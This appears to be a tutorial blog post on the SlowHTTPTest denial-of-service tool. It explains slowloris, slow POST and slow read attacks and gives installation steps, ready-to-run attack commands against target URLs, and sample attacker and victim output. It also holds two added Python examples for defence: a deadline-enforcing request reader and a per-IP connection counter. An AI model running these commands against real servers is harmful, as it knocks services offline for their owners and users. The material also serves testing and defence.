SlowHTTPTest is a highly configurable tool that simulates some Application Layer Denial of Service attacks. It works on most Linux platforms, OS X and Cygwin, a Unix-like environment and command-line interface for Microsoft Windows.
It implements most common low-bandwidth Application Layer DoS attacks, such as slowloris, Slow HTTP POST, and Slow Read attack (based on the TCP persist timer exploit), by draining the concurrent connections pool, as well as the Apache Range Header attack, by causing very significant memory and CPU usage on the server.
Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service. This tool sends partial HTTP requests, trying to get a denial of service from the target HTTP server.
Slow Read DoS attack aims at the same resources as slowloris and slow POST, but instead of prolonging the request, it sends a legitimate HTTP request and reads the response slowly.
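The server-side behaviour described above is easiest to see with a small request-head reader that enforces a deadline. The Python below is an added example written for this post, not code from the slowhttptest project; the function names, MAX_HEAD_BYTES, the two timeout modes and the dripping client are assumptions, and the client's pieces are constructed. It contrasts a per-read timeout, which a client that sends one header line at a time never trips, with a total deadline on the whole request head, which is what actually bounds how long a worker can be held.

```python
import socket
import threading
import time

# Added example for this post, not code from the slowhttptest project.
# MAX_HEAD_BYTES, the two timeout modes and the dripping client are assumptions
# made to illustrate why an incomplete request can hold a worker.
MAX_HEAD_BYTES = 8192
HEAD_END = b"\r\n\r\n"


def read_request_head(conn, per_read_timeout=None, total_deadline=None):
    """Read an HTTP request head (everything up to the blank line) from conn.

    per_read_timeout: seconds each individual recv() may wait. A client that
        sends one header line just inside this window resets it every time and
        keeps the worker busy for as long as it likes.
    total_deadline: wall-clock seconds allowed for the whole head, regardless
        of how many pieces arrive (the behaviour of a header-read deadline such
        as Apache mod_reqtimeout's header= setting).
    Returns the head bytes; raises TimeoutError, ConnectionError or ValueError.
    """
    deadline = None if total_deadline is None else time.monotonic() + total_deadline
    buf = b""
    while HEAD_END not in buf:
        wait = per_read_timeout
        if deadline is not None:
            remaining = deadline - time.monotonic()
            if remaining <= 0:
                raise TimeoutError("request head not complete within total deadline")
            wait = remaining if wait is None else min(wait, remaining)
        conn.settimeout(wait)
        try:
            chunk = conn.recv(4096)
        except socket.timeout:
            raise TimeoutError("no data within timeout while reading request head") from None
        if not chunk:
            raise ConnectionError("peer closed before completing the request head")
        buf += chunk
        if len(buf) > MAX_HEAD_BYTES:
            raise ValueError("request head larger than MAX_HEAD_BYTES")
    return buf.split(HEAD_END, 1)[0]


def _drip(client, pieces, interval):
    """Constructed client: send the pieces one at a time, then close."""
    try:
        for piece in pieces:
            time.sleep(interval)
            client.sendall(piece)
    except OSError:
        pass  # the server already gave up on this connection
    finally:
        client.close()


def simulate(pieces, interval, **reader_kwargs):
    """Run the reader against a dripping client; return (outcome, elapsed_seconds)."""
    server, client = socket.socketpair()
    sender = threading.Thread(target=_drip, args=(client, pieces, interval), daemon=True)
    start = time.monotonic()
    sender.start()
    try:
        read_request_head(server, **reader_kwargs)
        outcome = "complete"
    except TimeoutError:
        outcome = "timeout"
    except ConnectionError:
        outcome = "closed"
    finally:
        elapsed = time.monotonic() - start
        server.close()
    sender.join()
    return outcome, elapsed


# Constructed inputs: a head that never ends (ten lines, no blank line) and a
# normal complete one.
SLOW_PIECES = [b"GET / HTTP/1.1\r\n", b"Host: example.test\r\n"] + [b"X-a: b\r\n"] * 8
FAST_PIECES = [b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"]

if __name__ == "__main__":
    # Per-read timeout: every line lands inside the window, so the worker waits
    # until the client finally closes (about 1 s here, indefinitely in practice).
    print("per-read 0.5s :", simulate(SLOW_PIECES, 0.1, per_read_timeout=0.5))
    # Total deadline: the worker is released after 0.4 s whatever the client does.
    print("deadline 0.4s :", simulate(SLOW_PIECES, 0.1, total_deadline=0.4))
    print("normal client :", simulate(FAST_PIECES, 0.0, total_deadline=0.4))
```

The point of the two modes is that a plain socket timeout (Apache's Timeout directive, or the per-read mode here) is reset by every byte that arrives, so it does nothing against a client that keeps sending a little; only a budget for the whole request head, plus a size cap, releases the worker.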
Installation
Installation for Kali Linux users
For Kali Linux users, install via apt-get (life is good!)
root@kali: # apt-get install slowhttptest
Reading bundle lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
slowhttptest
0 upgraded, 1 newly installed, 0 to remove and 25 not upgraded.
Need to get 29.6 kB of archives.
After this operation, 98.3 kB of additional disk space will be used.
Get:1 http://http.kali.org/kali/ kali/main slowhttptest amd64 1.6-1kali1 [29.6 kB]
Fetched 29.6 kB in 1s (21.8 kB/s)
Selecting previously unselected package slowhttptest.
(Reading database ... 376593 files and directories currently installed.)
Unpacking slowhttptest (from .../slowhttptest_1.6-1kali1_amd64.deb) ...
Processing triggers for man-db ...
Setting up slowhttptest (1.6-1kali1) ...
root@kali: #
For other Linux distributions
The tool is distributed as a portable package, so just download the latest tarball from the Downloads section, extract, configure, compile, and install:
$ tar -xzvf slowhttptest-x.x.tar.gz
$ cd slowhttptest-x.x
$ ./configure --prefix=PREFIX
$ make
$ sudo make install
Where PREFIX must be replaced with the absolute path where the slowhttptest tool should be installed.
You need libssl-dev to be installed to successfully compile the tool. Most systems would have it.
Alternatively
Mac OS X
Using Homebrew:
brew update && brew install slowhttptest
Linux
Try your favorite package manager; some of them are aware of slowhttptest (like Kali Linux).
Usage
slowhttptest is a great tool as it allows you to do many things. Following are a few usages.
Example of usage in slow message body mode
slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Same test with graph
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Example of usage in slowloris mode
slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3
Same test with graph
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3
Example of usage in slow read mode with probing through proxy
Here the x.x.x.x:8080 proxy is used to check website availability from an IP different than yours:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver/somebigresource -p 5 -l 350 -e x.x.x.x:8080
Output
Depending on the verbosity level, the output can be either as simple as a heartbeat message generated every 5 seconds showing the status of connections with verbosity level 1, or a full traffic dump with verbosity level 4.
The -g option would generate both a CSV file and an interactive HTML page based on Google Chart Tools.
Here is a sample screenshot of the generated HTML page that contains graphically represented connection states and server availability intervals, and gives the picture of how a particular server behaves under a specific load within a given time frame.
The CSV file can be used as a data source for your favorite chart-building tool, like MS Excel, iWork Numbers, or Google Docs.
The last message you’ll see is the exit status, which hints at possible program termination reasons:
Exit status | Meaning
“Hit test time limit” | program reached the time limit specified with the -l argument
“No open connections left” | peer closed all connections
“Cannot establish connection” | no connections were established during the first N seconds of the test, where N is either the value of the -i argument, or 10, if not specified. This would happen if there is no route to host or the remote peer is down
“Connection refused” | remote peer doesn’t accept connections (from you only? Use proxy to probe) on the specified port
“Cancelled by user” | you pressed Ctrl-C or sent SIGINT in another way
“Unexpected error” | should never happen
Sample output for a real test
I’ve done this test on a sample server and this is what I’ve seen from both the attacking and victim end.
From attacker's end
So, I am collecting stats and attacking www.localhost.com with 1000 connections.
root@kali: # slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.localhost.com -x 10 -p 3
Tue Sep 23 11:22:57 2014:
slowhttptest version 1.6
- https://code.google.com/p/slowhttptest/ -
test type: SLOW BODY
number of connections: 1000
URL: http://www.localhost.com/
verb: FAKEVERB
Content-Length header value: 8192
follow up data max size: 22
interval between follow up data: 110 seconds
connections per seconds: 200
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Tue Sep 23 11:22:57 2014:
slow HTTP test status on 85th second:
initializing: 0
pending: 23
connected: 133
error: 0
closed: 844
service available: YES
^CTue Sep 23 11:22:58 2014:
Test ended on 86th second
Exit status: Cancelled by user
CSV report saved to my_body_stats.csv
HTML report saved to my_body_stats.html
From victim server's end:
rootuser@localhost [/home]# pgrep httpd | wc -l
151
Total number of httpd connections jumped to 151 within 85 seconds. (I’ve got a fast Internet!)
And of course I want to see what’s in my /var/log/messages
rootuser@someserver [/var/log]# tail -100 message | grep Firewall
Sep 23 11:43:39 someserver: IP 1.2.3.4 (XX/Anonymous/1-2-3-4) found to have 504 connections
As you can see I managed to crank up 504 connections from a single IP in less than 85 seconds … This is more than enough to bring down a server (well, most small servers and VPS’s for sure).
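Counting httpd processes shows the load but not where it comes from; the firewall line above is more useful because it is per source IP. As an added example (not from the post or the slowhttptest project), the Python below counts established connections per peer IP to the web ports from `ss -tan`-style output, flags sources at or above a threshold, and parses an alert line in the format shown above. The sample output, the alert line, WEB_PORTS and the threshold are all constructed assumptions, and the IPs are documentation-range addresses.

```python
import re
from collections import Counter

# Added example, not from the post or the slowhttptest project. The sample
# `ss -tan`-style output and the alert line are constructed; the addresses are
# documentation-range IPs. WEB_PORTS and the threshold are assumptions.
WEB_PORTS = {80, 443}

SAMPLE_SS_OUTPUT = """\
State     Recv-Q Send-Q Local Address:Port   Peer Address:Port
ESTAB     0      0      10.0.0.5:80          198.51.100.7:51234
ESTAB     0      0      10.0.0.5:80          198.51.100.7:51235
ESTAB     0      0      10.0.0.5:80          198.51.100.7:51236
ESTAB     0      0      10.0.0.5:443         203.0.113.9:40001
ESTAB     0      0      10.0.0.5:22          198.51.100.7:60000
SYN-RECV  0      0      10.0.0.5:80          198.51.100.7:51237
ESTAB     0      0      [2001:db8::5]:80     [2001:db8::1]:5555
ESTAB     0      0      [2001:db8::5]:80     [2001:db8::1]:5556
"""

# Constructed line in the format of the firewall message quoted in the post.
SAMPLE_ALERT = ("Sep 23 11:43:39 someserver: IP 198.51.100.7 (XX/Anonymous/198-51-100-7) "
                "found to have 504 connections")
ALERT_RE = re.compile(r"IP (\S+) \([^)]*\) found to have (\d+) connections")


def split_host_port(addr):
    """Split 'host:port' or '[v6addr]:port' into (host, port)."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), int(port)


def count_web_connections(ss_text, ports=WEB_PORTS, states=("ESTAB",)):
    """Count connections per peer IP, to the given local ports, in the given states."""
    counts = Counter()
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] not in states:
            continue  # header line, or a state we are not counting
        _, local_port = split_host_port(fields[3])
        peer_ip, _ = split_host_port(fields[4])
        if local_port in ports:
            counts[peer_ip] += 1
    return counts


def offenders(counts, threshold):
    """Peers holding at least `threshold` counted connections, busiest first."""
    return sorted(((ip, n) for ip, n in counts.items() if n >= threshold),
                  key=lambda item: -item[1])


def parse_firewall_alert(line):
    """Return (ip, connection_count) from an alert line, or None if it does not match."""
    m = ALERT_RE.search(line)
    return (m.group(1), int(m.group(2))) if m else None


if __name__ == "__main__":
    counts = count_web_connections(SAMPLE_SS_OUTPUT)
    for ip, n in offenders(counts, threshold=2):
        print(f"{ip} holds {n} web connections")
    print(parse_firewall_alert(SAMPLE_ALERT))
```

On a real host, feed it the output of `ss -tan` and set the threshold to something well above what a browser legitimately opens to one site; a single address holding hundreds of connections to port 80, as in the log line above, stands out immediately, while the SYN-RECV and SSH entries are left out of the count.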
Further reading and references
- Slowhttptest in Google
- How I knocked down 30 servers using slowhttptest
- Slow Read DoS attack explained
- Test results of popular HTTP servers
- How to protect against slow HTTP DoS attacks
Conclusion:
To make matters worse, you can use it from Windows, Linux and even a Mac. If you can run multiple DoS tools such as GoldenEye and hping3 against a single web server, then it is very easy to knock it down. There are strategies to defend against such attacks (see #5 on the Further reading and references list), but for a small server where resources are limited and which is run by non-IT people (bloggers etc.) it quickly becomes a nightmare. Thanks for reading, please share and RT.